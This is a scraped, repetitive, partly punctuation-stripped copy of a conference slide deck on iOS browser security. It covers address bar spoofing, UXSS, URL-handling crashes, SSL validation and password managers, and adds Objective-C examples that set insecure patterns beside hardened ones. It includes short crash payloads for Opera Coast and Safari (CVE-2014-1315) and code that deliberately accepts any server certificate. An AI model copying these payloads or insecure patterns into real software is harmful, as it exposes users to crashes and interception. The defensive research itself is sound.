bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 67: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/67.jpg)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 68: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/68.jpg)
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 69: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/69.jpg)
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 70: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/70.jpg)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
![Page 71: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/71.jpg)
In this presentation
• iOS Browsers: UIWebView & WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
Mobile Browsers Security iOS
![Page 72: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/72.jpg)
SSL
• By default, a UIWebView rejects https requests with invalid certificates, without any user interaction
• The app can change this (e.g. to let the user accept a self-signed certificate)
• 14 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
SSL & password managers
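An added example (not code from the slides) of the decision the SSL bullets describe, written in Objective-C for a UIWebView-based browser that sees server-trust challenges itself through an NSURLConnection delegate (the usual way third-party browsers get at them). It puts the "silently accept" pattern beside a fail-closed version that evaluates the chain for every host, not only the main document's, and scopes a user override to the exact host the warning was shown for. BrowserTrustPolicy, userAcceptedHosts and the insecure_ method name are hypothetical.

```objective-c
#import <Foundation/Foundation.h>
#import <Security/Security.h>

@interface BrowserTrustPolicy : NSObject <NSURLConnectionDelegate>
// Hosts the user explicitly accepted after a certificate warning (hypothetical store).
@property (nonatomic, strong) NSMutableSet *userAcceptedHosts;
@end

@implementation BrowserTrustPolicy

// Weak pattern, as found in browsers that "silently accept" self-signed certs:
// every server trust is turned into a credential without being evaluated, so
// any certificate presented by a man-in-the-middle is good enough.
- (void)insecure_connection:(NSURLConnection *)connection
willSendRequestForAuthenticationChallenge:(NSURLAuthenticationChallenge *)challenge
{
    NSURLProtectionSpace *space = challenge.protectionSpace;
    if ([space.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust]) {
        [challenge.sender useCredential:[NSURLCredential credentialForTrust:space.serverTrust]
             forAuthenticationChallenge:challenge];
        return;
    }
    [challenge.sender performDefaultHandlingForAuthenticationChallenge:challenge];
}

// Hardened pattern: evaluate the chain (the system SSL policy on serverTrust
// already includes host-name matching) for every challenge, whichever host
// it comes from, and only honour an explicit, per-host user override.
- (void)connection:(NSURLConnection *)connection
willSendRequestForAuthenticationChallenge:(NSURLAuthenticationChallenge *)challenge
{
    NSURLProtectionSpace *space = challenge.protectionSpace;
    if (![space.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust]) {
        [challenge.sender performDefaultHandlingForAuthenticationChallenge:challenge];
        return;
    }

    SecTrustRef trust = space.serverTrust;
    SecTrustResultType result = kSecTrustResultInvalid;
    OSStatus status = SecTrustEvaluate(trust, &result);
    BOOL chainOK = (status == errSecSuccess) &&
                   (result == kSecTrustResultUnspecified || result == kSecTrustResultProceed);

    if (chainOK) {
        [challenge.sender useCredential:[NSURLCredential credentialForTrust:trust]
             forAuthenticationChallenge:challenge];
    } else if ([self.userAcceptedHosts containsObject:space.host]) {
        // The override is keyed on the challenged host, so a subframe or
        // subresource served from another host does not inherit it; that is
        // the "validation for the main domain only" mistake.
        [challenge.sender useCredential:[NSURLCredential credentialForTrust:trust]
             forAuthenticationChallenge:challenge];
    } else {
        // Same outcome as the UIWebView default: fail closed, nothing accepted silently.
        [challenge.sender cancelAuthenticationChallenge:challenge];
    }
}

@end
```

A browser that wants a "proceed anyway" button should add the host to userAcceptedHosts only from that warning UI, and clear the set when the session ends; an override that lives forever is only marginally better than accepting everything.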
![Page 73: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/73.jpg)
SSL & password managers
![Page 74: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/74.jpg)
Password managers
• The injected JavaScript runs with the privileges of the top frame, so passwords are not filled into subframes
• It is usually possible to force saving a password for another domain (with or without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
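An added example, not code from the slides, of the native half of a UIWebView password manager whose fill and save actions are triggered from injected JavaScript. It shows the hostname-only lookup the third bullet warns about beside a lookup keyed on the full origin (scheme, host, port) taken from the web view's own mainDocumentURL, which also covers the second bullet: the origin a credential is saved under never comes from a value the page's script passes over the bridge. PasswordManager, OriginForURL and the dictionary layout of the store are hypothetical.

```objective-c
#import <Foundation/Foundation.h>
#import <UIKit/UIKit.h>

// Origin = scheme://host[:port], lower-cased. Keying on the host alone is the
// weakness the slide describes: http://example.com and https://example.com
// would share a single entry.
static NSString *OriginForURL(NSURL *url)
{
    if (url.scheme.length == 0 || url.host.length == 0) {
        return nil;
    }
    NSString *origin = [NSString stringWithFormat:@"%@://%@",
                        url.scheme.lowercaseString, url.host.lowercaseString];
    if (url.port != nil) {
        origin = [origin stringByAppendingFormat:@":%@", url.port];
    }
    return origin;
}

@interface PasswordManager : NSObject
@property (nonatomic, strong) NSMutableDictionary *store; // origin -> @{ @"user": ..., @"pass": ... }
@end

@implementation PasswordManager

- (instancetype)init
{
    self = [super init];
    if (self) {
        _store = [NSMutableDictionary dictionary];
    }
    return self;
}

// Weak lookup: compares host names only, so a credential saved on
// https://example.com is offered to an http://example.com page as well,
// where anyone on the network path can read the filled form.
- (NSDictionary *)insecure_credentialForURL:(NSURL *)pageURL
{
    if (pageURL.host == nil) {
        return nil;
    }
    for (NSString *origin in self.store) {
        NSURL *saved = [NSURL URLWithString:origin];
        if ([saved.host caseInsensitiveCompare:pageURL.host] == NSOrderedSame) {
            return self.store[origin];
        }
    }
    return nil;
}

// Hardened lookup: exact origin match against the top-level document. The
// decision is made for mainDocumentURL only; the injected JavaScript runs in
// the top frame, so a cross-domain subframe is never filled.
- (NSDictionary *)credentialForWebView:(UIWebView *)webView
{
    NSURL *top = webView.request.mainDocumentURL ?: webView.request.URL;
    NSString *origin = OriginForURL(top);
    return origin ? self.store[origin] : nil;
}

// Hardened save: the origin is derived from the web view's own request, never
// from a string the page's JavaScript sends over the bridge, so a page cannot
// make the browser store a credential under a different domain.
- (void)saveCredentialFromWebView:(UIWebView *)webView
                             user:(NSString *)user
                         password:(NSString *)password
{
    NSString *origin = OriginForURL(webView.request.mainDocumentURL ?: webView.request.URL);
    if (origin == nil || user.length == 0 || password.length == 0) {
        return;
    }
    self.store[origin] = @{ @"user": user, @"pass": password };
}

@end
```

The bridge message from the page should carry only the user name and password fields; everything that decides where the credential belongs is read from the UIWebView on the native side.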
![Page 75: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/75.jpg)
SSL & password managers
![Page 76: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/76.jpg)
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most third-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
![Page 77: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/77.jpg)
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
![Page 78: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/78.jpg)
References
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
![Page 79: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/79.jpg)
References
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
![Page 80: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/80.jpg)
References
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
![Page 81: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/81.jpg)
Questions?
![Page 82: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/82.jpg)
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you